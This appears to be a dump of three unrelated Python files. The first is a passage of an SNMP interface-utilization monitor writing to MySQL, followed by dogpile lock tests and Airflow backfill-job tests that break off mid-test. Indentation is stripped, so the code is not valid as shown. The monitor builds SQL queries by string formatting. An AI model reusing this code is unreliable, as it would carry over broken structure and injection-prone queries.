if device_interfaces[i]["util_percentage"] > percentage_threashold:
print "interface {} on {} is at {}% which is above threashold".format(
device_interfaces[i]["name"],
device_ip,
device_interfaces[i]["util_percentage"])
traffic_automation(device_interfaces[i], device_ip, community)
#t = Thread(target=traffic_automation, args=(device_interfaces[i], device_ip, community,))
#t.start()
def calculate_interface_util(device_int, time_now):
"""
Author - Jonathan Steward
Function - calculate the utilization on the interface
Inputs -
device_int - object - combined database and snmp gathered information
time_now - datetime object - Time of the poll for traffic counter
returns -
bool - state of if there was an increase on the counter
device_int - object - combined database and snmp gathered information
"""
device_int["current_counter"] = int(device_int["current_counter"])
device_int["previous_counter"] = int(device_int["previous_counter"])
if device_int["current_counter"] == device_int["previous_counter"]:
# print "no traffic on interface {} on {}".format(device_int["name"], device_ip)
return False, device_int
device_int["update_time"] = time_now
device_int["seconds_since"] = (time_now - device_int["previous_update"]).seconds
device_int["bits_out"] = (device_int["current_counter"] * 8) - (device_int["previous_counter"] * 8)
max_int = 9223372036854775807
if device_int["bits_out"] < 0:
device_int["bits_out"] = (max_int - device_int["previous_counter"]) + device_int["current_counter"]
device_int["bits_per_sec"] = device_int["bits_out"] / device_int["seconds_since"]
device_int["util_percentage"] = float(device_int["bits_per_sec"]) * 100 / float(device_int["speed"])
device_int["util_percentage"] = round(device_int["util_percentage"], 3)
return True, device_int
def update_interface_and_history(device_int):
"""
Author - Jonathan Steward
Function - update the interface details on the database
Inputs -
device_int - object - combined database and snmp gathered information
returns - n/a
"""
command = """
UPDATE `FYP Data`.`interfaces`
SET `traffic_out_counter`='{}', `last_updated` = '{}'
WHERE `interface_id`='{}';""".format(
int(device_int["current_counter"]),
device_int["update_time"],
device_int["db_id"])
set_data_mysql(command)
#print "updating interface with following mysql command:\n{}".format(command)
# UPDATE HISTORY FEATURES OMMITTED AS IT WOULD NOT BE USED RIGHT NOW
def check_for_event(device_int, device_ip):
"""
Author - Jonathan Steward
Function - checks for an existing event and if one exists if its an old event or not
Inputs -
    Global - timeout_minuets - how many minutes old an event
    needs to be before it is closed.
device_int - object - combined database and snmp gathered information
device_ip - string - ip address of the host for this event
returns -
"""
command = """
SELECT * FROM `FYP Data`.interface_events
where `interface_id` = '{}'
and `state` = 'active'
and `issue` = 'out utilization'""".format(device_int["db_id"])
events = get_data(command)
if events:
time_now = datetime.now()
time_diff = (time_now - events[0][4]).seconds
timeout_minuets = 5
if time_diff / 60 > timeout_minuets:
print_error("closing old event older than {} minuets".format(timeout_minuets))
command = """
UPDATE `FYP Data`.`interface_events`
SET `state` = 'resolved'
WHERE event_id = {} ;""".format(events[0][0])
set_data_mysql(command)
else:
print "event for {} on {} already exists will not act".format(device_int["name"], device_ip)
return False
command = """
INSERT INTO `FYP Data`.`interface_events` (`interface_id`, `state`, `issue`)
VALUES ('{}', 'active', 'out utilization');""".format(device_int["db_id"])
set_data_mysql(command)
return True
def traffic_automation(device_int, device_ip, community):
"""
Author - Jonathan Steward
    Function - Checks for an existing event; if there is none, loops calling the individual
    traffic check, and once the threshold has been breached the identified number of times, triggers automation
Inputs -
    GLOBAL - minuets - Number of minutes/attempts/data points to wait before triggering automation
device_int - object - combined database and snmp gathered information
device_ip - string - ip address of host with high utilization
community - string - community string needed for SNMP
returns - n/a
"""
state = check_for_event(device_int, device_ip)
if not state:
return
re_tries = 0
while re_tries < minuets:
state, device_int = individual_traffic_check(device_int, device_ip, community, re_tries)
update_interface_and_history(device_int)
if not state:
print "interface {} on {} didn't break the threashold on datapoint {} with {}%".format(
device_int["name"],
device_ip,
re_tries,
device_int["util_percentage"])
close_event(device_int)
return
else:
re_tries += 1
#print_error("TRIGGER AUTOMATION")
state = add_cost_workflow(device_ip, device_int["name"], 10, "automation")
close_event(device_int)
def close_event(device_int):
"""
Author - Jonathan Steward
Function - closes event that was created once automation has been triggered
Inputs -
device_int - object - combined database and snmp gathered information
returns - n/a
"""
command = """
SELECT * FROM `FYP Data`.interface_events
where interface_id = {} and state ='active' and issue = 'out utilization'""".format(device_int["db_id"])
event = get_data(command)
command = """
UPDATE `FYP Data`.`interface_events`
SET `state` = 'resolved'
WHERE event_id = {} ;""".format(event[0][0])
set_data_mysql(command)
update_interface_and_history(device_int)
def individual_traffic_check(device_int, device_ip, community, re_tries):
"""
Author - Jonathan Steward
Function - checks for one interface the current utilization, calculation of util is in
another function however
Inputs -
device_int - object - combined database and snmp gathered information
device_ip - string - ip address of host with high utilization
community - string - community string needed for SNMP
re_tries - int - number of re-tries so far
returns -
bool - state of if the util is above the threshold
object - device_int - combined database and snmp gathered information
"""
print "sleeping for some time"
time.sleep(interval)
    # Sleep for the configured interval, then poll for a new data point
device_int["previous_counter"] = device_int["current_counter"]
int_traffic = snmppoll(
"GET",
".1.3.6.1.2.1.31.1.1.1.10.{}".format(device_int["oid_index"]),
device_ip,
community)
time_now = datetime.now()
device_int["previous_update"] = device_int["update_time"]
device_int["update_time"] = time_now
device_int["current_counter"] = int_traffic.value
state, device_int = calculate_interface_util(device_int, time_now)
if not state:
return False, device_int
print_polling_traffic_stats(device_int)
if device_int["util_percentage"] > percentage_threashold:
print "interface {} on {} is at {}% utilization this above the threashold attemp {}".format(
device_int["name"],
device_ip,
device_int["util_percentage"],
re_tries)
return True, device_int
    # Traffic flowed but didn't break the threshold
return False, device_int
def main():
command = "SELECT * FROM `FYP Data`.device_table;"
devices = get_data(command)
for device in devices:
(device_id, device_ip, vendor,
community, username, passwd,
enpass, config_lock, lock_reason, asn) = device
device_interfaces = Grab_device_interfaces_snmp(device_ip, community)
if not device_interfaces:
continue
device_interfaces = match_db_to_device(device_interfaces, device_id)
        poll_traffic(device_interfaces, device_ip, community)  # poll_traffic does not return a value
if __name__ == "__main__":
main()
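The counter arithmetic inside calculate_interface_util can be sanity-checked with a small standalone example. The sketch below assumes a 64-bit octet counter for the wrap case (the original wraps against 2**63 - 1) and is for illustration only.

# utilization_demo.py -- illustrative sketch of the utilization arithmetic
COUNTER_MAX = 2 ** 64 - 1  # assumption: ifHCOutOctets is a 64-bit octet counter

def utilization_percent(prev_octets, curr_octets, seconds, speed_bps):
    delta = curr_octets - prev_octets
    if delta < 0:  # the counter wrapped between the two polls
        delta = (COUNTER_MAX - prev_octets) + curr_octets
    bits_per_sec = (delta * 8) / float(seconds)
    return round(bits_per_sec * 100.0 / speed_bps, 3)

# 75 MB sent in 60 s on a 100 Mb/s link -> 10.0 (% utilization)
print(utilization_percent(0, 75 * 1000 * 1000, 60, 100 * 1000 * 1000))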
|
test_lock.py
|
from unittest import TestCase
import time
import threading
from dogpile import Lock, NeedRegenerationException
from dogpile.util import ReadWriteMutex
import contextlib
import math
import logging
import mock
log = logging.getLogger(__name__)
class ConcurrencyTest(TestCase):
    # expiretime, time to create, num usages, time spent using, delay between usages
_assertion_lock = threading.Lock()
def test_quick(self):
self._test_multi(
10, 2, .5, 50, .05, .1,
)
def test_slow(self):
self._test_multi(
10, 5, 2, 50, .1, .1,
)
# TODO: this is a port from the legacy test_dogpile test.
# sequence and calculations need to be revised.
# def test_get_value_plus_created_slow_write(self):
# self._test_multi(
# 10, 2, .5, 50, .05, .1,
# slow_write_time=2
# )
def test_return_while_in_progress(self):
self._test_multi(
10, 5, 2, 50, 1, .1
)
def test_get_value_plus_created_long_create(self):
self._test_multi(
10, 2, 2.5, 50, .05, .1,
)
def test_get_value_plus_created_registry_unsafe_cache(self):
self._test_multi(
10, 1, .6, 100, .05, .1,
cache_expire_time='unsafe'
)
def test_get_value_plus_created_registry_safe_cache_quick(self):
self._test_multi(
10, 2, .5, 50, .05, .1,
cache_expire_time='safe'
)
def test_get_value_plus_created_registry_safe_cache_slow(self):
self._test_multi(
10, 5, 2, 50, .1, .1,
cache_expire_time='safe'
)
def _assert_synchronized(self):
acq = self._assertion_lock.acquire(False)
assert acq, "Could not acquire"
@contextlib.contextmanager
def go():
try:
yield {}
except:
raise
finally:
self._assertion_lock.release()
return go()
def _assert_log(self, cond, msg, *args):
if cond:
log.debug(msg, *args)
else:
log.error("Assertion failed: " + msg, *args)
assert False, msg % args
def _test_multi(
self, num_threads,
expiretime,
creation_time,
num_usages,
usage_time,
delay_time,
cache_expire_time=None,
slow_write_time=None
):
mutex = threading.Lock()
if slow_write_time:
readwritelock = ReadWriteMutex()
unsafe_cache = False
if cache_expire_time:
if cache_expire_time == 'unsafe':
unsafe_cache = True
cache_expire_time = expiretime * .8
elif cache_expire_time == 'safe':
cache_expire_time = (expiretime + creation_time) * 1.1
else:
assert False, cache_expire_time
log.info("Cache expire time: %s", cache_expire_time)
effective_expiretime = min(cache_expire_time, expiretime)
else:
effective_expiretime = expiretime
effective_creation_time = creation_time
max_stale = (
effective_expiretime + effective_creation_time +
usage_time + delay_time) * 1.1
the_resource = []
slow_waiters = [0]
failures = [0]
def create_resource():
with self._assert_synchronized():
log.debug(
"creating resource, will take %f sec" % creation_time)
time.sleep(creation_time)
if slow_write_time:
readwritelock.acquire_write_lock()
try:
saved = list(the_resource)
# clear out the resource dict so that
# usage threads hitting it will
# raise
the_resource[:] = []
time.sleep(slow_write_time)
the_resource[:] = saved
finally:
readwritelock.release_write_lock()
the_resource.append(time.time())
value = the_resource[-1]
log.debug("finished creating resource")
return value, time.time()
def get_value():
if not the_resource:
raise NeedRegenerationException()
if cache_expire_time:
if time.time() - the_resource[-1] > cache_expire_time:
# should never hit a cache invalidation
# if we've set expiretime below the cache
# expire time (assuming a cache which
# honors this).
self._assert_log(
cache_expire_time < expiretime,
"Cache expiration hit, cache "
"expire time %s, expiretime %s",
cache_expire_time,
expiretime,
)
raise NeedRegenerationException()
if slow_write_time:
readwritelock.acquire_read_lock()
try:
return the_resource[-1], the_resource[-1]
finally:
if slow_write_time:
readwritelock.release_read_lock()
def use_dogpile():
try:
for i in range(num_usages):
now = time.time()
with Lock(
mutex, create_resource,
get_value, expiretime) as value:
waited = time.time() - now
if waited > .01:
slow_waiters[0] += 1
check_value(value, waited)
time.sleep(usage_time)
time.sleep(delay_time)
except:
log.error("thread failed", exc_info=True)
failures[0] += 1
def check_value(value, waited):
assert value
# time since the current resource was
# created
time_since_create = time.time() - value
self._assert_log(
time_since_create < max_stale,
"Time since create %.4f max stale time %s, "
"total waited %s",
time_since_create, max_stale,
slow_waiters[0]
)
started_at = time.time()
threads = []
for i in range(num_threads):
t = threading.Thread(target=use_dogpile)
t.start()
threads.append(t)
for t in threads:
t.join()
actual_run_time = time.time() - started_at
# time spent starts with num usages * time per usage, with a 10% fudge
expected_run_time = (num_usages * (usage_time + delay_time)) * 1.1
expected_generations = math.ceil(
expected_run_time / effective_expiretime)
if unsafe_cache:
expected_slow_waiters = expected_generations * num_threads
else:
expected_slow_waiters = expected_generations + num_threads - 1
if slow_write_time:
expected_slow_waiters = num_threads * expected_generations
# time spent also increments by one wait period in the beginning...
expected_run_time += effective_creation_time
# and a fudged version of the periodic waiting time anticipated
# for a single thread...
expected_run_time += (
expected_slow_waiters * effective_creation_time) / num_threads
expected_run_time *= 1.1
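        # Rough worked example (illustrative only) using test_quick's numbers
        # (10 threads, expiretime 2, creation_time .5, 50 usages, .05 use / .1 delay):
        #   base run time  = 50 * (.05 + .1) * 1.1           = 8.25
        #   generations    = ceil(8.25 / 2)                   = 5
        #   slow waiters   = 5 + 10 - 1                       = 14
        #   final budget   = (8.25 + .5 + 14 * .5 / 10) * 1.1 ~= 10.4 seconds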
log.info("Test Summary")
log.info(
"num threads: %s; expiretime: %s; creation_time: %s; "
"num_usages: %s; "
"usage_time: %s; delay_time: %s",
num_threads, expiretime, creation_time, num_usages,
usage_time, delay_time
)
log.info(
"cache expire time: %s; unsafe cache: %s",
cache_expire_time, unsafe_cache)
log.info(
"Estimated run time %.2f actual run time %.2f",
expected_run_time, actual_run_time)
log.info(
"Effective expiretime (min(cache_exp_time, exptime)) %s",
effective_expiretime)
log.info(
"Expected slow waits %s, Total slow waits %s",
expected_slow_waiters, slow_waiters[0])
log.info(
"Total generations %s Max generations expected %s" % (
len(the_resource), expected_generations
)
)
assert not failures[0], "%s failures occurred" % failures[0]
assert actual_run_time <= expected_run_time
assert slow_waiters[0] <= expected_slow_waiters, \
"Number of slow waiters %s exceeds expected slow waiters %s" % (
slow_waiters[0],
expected_slow_waiters
)
assert len(the_resource) <= expected_generations,\
"Number of resource generations %d exceeded "\
"expected %d" % (
len(the_resource),
expected_generations)
class RaceConditionTests(TestCase):
def test_no_double_get_on_expired(self):
mutex = threading.Lock()
the_value = "the value"
expiration_time = 10
created_time = 10
current_time = 22 # e.g. it's expired
def creator():
return the_value, current_time
def value_and_created_fn():
return the_value, created_time
value_and_created_fn = mock.Mock(side_effect=value_and_created_fn)
def time_mock():
return current_time
with mock.patch("dogpile.lock.time.time", time_mock):
with Lock(
mutex, creator, value_and_created_fn, expiration_time
) as entered_value:
self.assertEquals("the value", entered_value)
self.assertEquals(
value_and_created_fn.call_count, 1
)
|
test_backfill_job.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import json
import logging
import threading
from unittest.mock import patch
import pytest
from airflow import settings
from airflow.cli import cli_parser
from airflow.exceptions import (
AirflowException,
AirflowTaskTimeout,
BackfillUnfinished,
DagConcurrencyLimitReached,
NoAvailablePoolSlot,
TaskConcurrencyLimitReached,
)
from airflow.jobs.backfill_job import BackfillJob
from airflow.models import DagBag, Pool, TaskInstance as TI
from airflow.models.dagrun import DagRun
from airflow.models.taskinstance import TaskInstanceKey
from airflow.operators.dummy import DummyOperator
from airflow.utils import timezone
from airflow.utils.dates import days_ago
from airflow.utils.session import create_session
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from airflow.utils.types import DagRunType
from tests.models import TEST_DAGS_FOLDER
from tests.test_utils.db import (
clear_db_dags,
clear_db_pools,
clear_db_runs,
clear_db_xcom,
set_default_pool_slots,
)
from tests.test_utils.mock_executor import MockExecutor
from tests.test_utils.timetables import cron_timetable
logger = logging.getLogger(__name__)
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
@pytest.fixture(scope="module")
def dag_bag():
return DagBag(include_examples=True)
class TestBackfillJob:
@staticmethod
def clean_db():
clear_db_dags()
clear_db_runs()
clear_db_xcom()
clear_db_pools()
@pytest.fixture(autouse=True)
def set_instance_attrs(self, dag_bag):
self.clean_db()
self.parser = cli_parser.get_parser()
self.dagbag = dag_bag
def _get_dummy_dag(
self,
dag_maker_fixture,
dag_id='test_dag',
pool=Pool.DEFAULT_POOL_NAME,
max_active_tis_per_dag=None,
task_id='op',
**kwargs,
):
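        """Create a DAG containing a single DummyOperator via the given dag_maker fixture."""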
with dag_maker_fixture(dag_id=dag_id, schedule_interval='@daily', **kwargs) as dag:
DummyOperator(task_id=task_id, pool=pool, max_active_tis_per_dag=max_active_tis_per_dag)
return dag
def _times_called_with(self, method, class_):
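        """Count calls to ``method`` whose first positional argument is an instance of ``class_``."""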
count = 0
for args in method.call_args_list:
if isinstance(args[0][0], class_):
count += 1
return count
def test_unfinished_dag_runs_set_to_failed(self, dag_maker):
dag = self._get_dummy_dag(dag_maker)
dag_run = dag_maker.create_dagrun()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=8),
ignore_first_depends_on_past=True,
)
job._set_unfinished_dag_runs_to_failed([dag_run])
dag_run.refresh_from_db()
assert State.FAILED == dag_run.state
def test_dag_run_with_finished_tasks_set_to_success(self, dag_maker):
dag = self._get_dummy_dag(dag_maker)
dag_run = dag_maker.create_dagrun()
for ti in dag_run.get_task_instances():
ti.set_state(State.SUCCESS)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=8),
ignore_first_depends_on_past=True,
)
job._set_unfinished_dag_runs_to_failed([dag_run])
dag_run.refresh_from_db()
assert State.SUCCESS == dag_run.state
@pytest.mark.xfail(condition=True, reason="This test is flaky")
@pytest.mark.backend("postgres", "mysql")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
target_dag.sync_to_db()
# dag_file_processor = DagFileProcessor(dag_ids=[], log=Mock())
task_instances_list = []
# task_instances_list = dag_file_processor._process_task_instances(
# target_dag,
# dag_runs=DagRun.find(dag_id='example_trigger_target_dag')
# )
assert not task_instances_list
job = BackfillJob(
dag=dag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_first_depends_on_past=True
)
job.run()
task_instances_list = []
# task_instances_list = dag_file_processor._process_task_instances(
# target_dag,
# dag_runs=DagRun.find(dag_id='example_trigger_target_dag')
# )
assert task_instances_list
@pytest.mark.backend("postgres", "mysql")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('miscellaneous_test_dag')
end_date = DEFAULT_DATE + datetime.timedelta(days=1)
executor = MockExecutor(parallelism=16)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=end_date,
executor=executor,
ignore_first_depends_on_past=True,
)
job.run()
expected_execution_order = [
("runme_0", DEFAULT_DATE),
("runme_1", DEFAULT_DATE),
("runme_2", DEFAULT_DATE),
("runme_0", end_date),
("runme_1", end_date),
("runme_2", end_date),
("also_run_this", DEFAULT_DATE),
("also_run_this", end_date),
("run_after_loop", DEFAULT_DATE),
("run_after_loop", end_date),
("run_this_last", DEFAULT_DATE),
("run_this_last", end_date),
]
assert [
((dag.dag_id, task_id, f'backfill__{when.isoformat()}', 1, -1), (State.SUCCESS, None))
for (task_id, when) in expected_execution_order
] == executor.sorted_tasks
session = settings.Session()
drs = session.query(DagRun).filter(DagRun.dag_id == dag.dag_id).order_by(DagRun.execution_date).all()
assert drs[0].execution_date == DEFAULT_DATE
assert drs[0].state == State.SUCCESS
assert drs[1].execution_date == DEFAULT_DATE + datetime.timedelta(days=1)
assert drs[1].state == State.SUCCESS
dag.clear()
session.close()
@pytest.mark.backend("postgres", "mysql")
@pytest.mark.parametrize(
"dag_id, expected_execution_order",
[
[
"example_branch_operator",
(
"run_this_first",
"branching",
"branch_a",
"branch_b",
"branch_c",
"branch_d",
"follow_branch_a",
"follow_branch_b",
"follow_branch_c",
"follow_branch_d",
"join",
),
],
[
"miscellaneous_test_dag",
("runme_0", "runme_1", "runme_2", "also_run_this", "run_after_loop", "run_this_last"),
],
[
"example_skip_dag",
(
"always_true_1",
"always_true_2",
"skip_operator_1",
"skip_operator_2",
"all_success",
"one_success",
"final_1",
"final_2",
),
],
["latest_only", ("latest_only", "task1")],
],
)
def test_backfill_examples(self, dag_id, expected_execution_order):
"""
Test backfilling example dags
        Try to backfill some of the example dags. Be careful, not all dags are suitable
        for doing this. For example, a dag that sleeps forever or has no schedule won't
        work here, since such dags simply can't be backfilled.
"""
dag = self.dagbag.get_dag(dag_id)
logger.info('*** Running example DAG: %s', dag.dag_id)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
ignore_first_depends_on_past=True,
)
job.run()
assert [
((dag_id, task_id, f'backfill__{DEFAULT_DATE.isoformat()}', 1, -1), (State.SUCCESS, None))
for task_id in expected_execution_order
] == executor.sorted_tasks
def test_backfill_conf(self, dag_maker):
dag = self._get_dummy_dag(dag_maker, dag_id='test_backfill_conf')
dag_maker.create_dagrun()
executor = MockExecutor()
conf_ = json.loads("""{"key": "value"}""")
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf=conf_,
)
job.run()
# We ignore the first dag_run created by fixture
dr = DagRun.find(
dag_id='test_backfill_conf', execution_start_date=DEFAULT_DATE + datetime.timedelta(days=1)
)
assert conf_ == dr[0].conf
@patch('airflow.jobs.backfill_job.BackfillJob.log')
def test_backfill_respect_max_active_tis_per_dag_limit(self, mock_log, dag_maker):
max_active_tis_per_dag = 2
dag = self._get_dummy_dag(
dag_maker,
dag_id='test_backfill_respect_max_active_tis_per_dag_limit',
max_active_tis_per_dag=max_active_tis_per_dag,
)
dag_maker.create_dagrun()
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
assert len(executor.history) > 0
task_concurrency_limit_reached_at_least_once = False
num_running_task_instances = 0
for running_task_instances in executor.history:
assert len(running_task_instances) <= max_active_tis_per_dag
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == max_active_tis_per_dag:
task_concurrency_limit_reached_at_least_once = True
assert 8 == num_running_task_instances
assert task_concurrency_limit_reached_at_least_once
times_dag_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
times_task_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
TaskConcurrencyLimitReached,
)
assert 0 == times_pool_limit_reached_in_debug
assert 0 == times_dag_concurrency_limit_reached_in_debug
assert times_task_concurrency_limit_reached_in_debug > 0
@patch('airflow.jobs.backfill_job.BackfillJob.log')
def test_backfill_respect_dag_concurrency_limit(self, mock_log, dag_maker):
dag = self._get_dummy_dag(dag_maker, dag_id='test_backfill_respect_concurrency_limit')
dag_maker.create_dagrun()
dag.max_active_tasks = 2
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
assert len(executor.history) > 0
concurrency_limit_reached_at_least_once = False
num_running_task_instances = 0
for running_task_instances in executor.history:
assert len(running_task_instances) <= dag.max_active_tasks
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == dag.max_active_tasks:
concurrency_limit_reached_at_least_once = True
assert 8 == num_running_task_instances
assert concurrency_limit_reached_at_least_once
times_dag_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
times_task_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
TaskConcurrencyLimitReached,
)
assert 0 == times_pool_limit_reached_in_debug
assert 0 == times_task_concurrency_limit_reached_in_debug
assert times_dag_concurrency_limit_reached_in_debug > 0
@patch('airflow.jobs.backfill_job.BackfillJob.log')
def test_backfill_respect_default_pool_limit(self, mock_log, dag_maker):
default_pool_slots = 2
set_default_pool_slots(default_pool_slots)
dag = self._get_dummy_dag(dag_maker, dag_id='test_backfill_with_no_pool_limit')
dag_maker.create_dagrun()
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
assert len(executor.history) > 0
default_pool_task_slot_count_reached_at_least_once = False
num_running_task_instances = 0
# if no pool is specified, the number of tasks running in
# parallel per backfill should be less than
# default_pool slots at any point of time.
for running_task_instances in executor.history:
assert len(running_task_instances) <= default_pool_slots
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == default_pool_slots:
default_pool_task_slot_count_reached_at_least_once = True
assert 8 == num_running_task_instances
assert default_pool_task_slot_count_reached_at_least_once
times_dag_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
times_task_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
TaskConcurrencyLimitReached,
)
assert 0 == times_dag_concurrency_limit_reached_in_debug
assert 0 == times_task_concurrency_limit_reached_in_debug
assert times_pool_limit_reached_in_debug > 0
def test_backfill_pool_not_found(self, dag_maker):
dag = self._get_dummy_dag(
dag_maker,
dag_id='test_backfill_pool_not_found',
pool='king_pool',
)
dag_maker.create_dagrun()
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
try:
job.run()
except AirflowException:
return
@patch('airflow.jobs.backfill_job.BackfillJob.log')
def test_backfill_respect_pool_limit(self, mock_log, dag_maker):
session = settings.Session()
slots = 2
pool = Pool(
pool='pool_with_two_slots',
slots=slots,
)
session.add(pool)
session.commit()
dag = self._get_dummy_dag(
dag_maker,
dag_id='test_backfill_respect_pool_limit',
pool=pool.pool,
)
dag_maker.create_dagrun()
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
assert len(executor.history) > 0
pool_was_full_at_least_once = False
num_running_task_instances = 0
for running_task_instances in executor.history:
assert len(running_task_instances) <= slots
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == slots:
pool_was_full_at_least_once = True
assert 8 == num_running_task_instances
assert pool_was_full_at_least_once
times_dag_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
times_task_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
TaskConcurrencyLimitReached,
)
assert 0 == times_task_concurrency_limit_reached_in_debug
assert 0 == times_dag_concurrency_limit_reached_in_debug
assert times_pool_limit_reached_in_debug > 0
def test_backfill_run_rescheduled(self, dag_maker):
dag = self._get_dummy_dag(
dag_maker, dag_id="test_backfill_run_rescheduled", task_id="test_backfill_run_rescheduled_task-1"
)
dag_maker.create_dagrun()
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UP_FOR_RESCHEDULE)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True,
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
assert ti.state == State.SUCCESS
def test_backfill_rerun_failed_tasks(self, dag_maker):
dag = self._get_dummy_dag(
dag_maker, dag_id="test_backfill_rerun_failed", task_id="test_backfill_rerun_failed_task-1"
)
dag_maker.create_dagrun()
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True,
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
assert ti.state == State.SUCCESS
def test_backfill_rerun_upstream_failed_tasks(self, dag_maker):
with dag_maker(dag_id='test_backfill_rerun_upstream_failed', schedule_interval='@daily') as dag:
op1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1')
op2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2')
op1.set_upstream(op2)
dag_maker.create_dagrun()
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True,
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
assert ti.state == State.SUCCESS
def test_backfill_rerun_failed_tasks_without_flag(self, dag_maker):
dag = self._get_dummy_dag(
dag_maker, dag_id='test_backfill_rerun_failed', task_id='test_backfill_rerun_failed_task-1'
)
dag_maker.create_dagrun()
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=False,
)
with pytest.raises(AirflowException):
job.run()
def test_backfill_retry_intermittent_failed_task(self, dag_maker):
with dag_maker(
dag_id='test_intermittent_failure_job',
schedule_interval="@daily",
default_args={
'retries': 2,
'retry_delay': datetime.timedelta(seconds=0),
},
) as dag:
task1 = DummyOperator(task_id="task1")
dag_maker.create_dagrun()
executor = MockExecutor(parallelism=16)
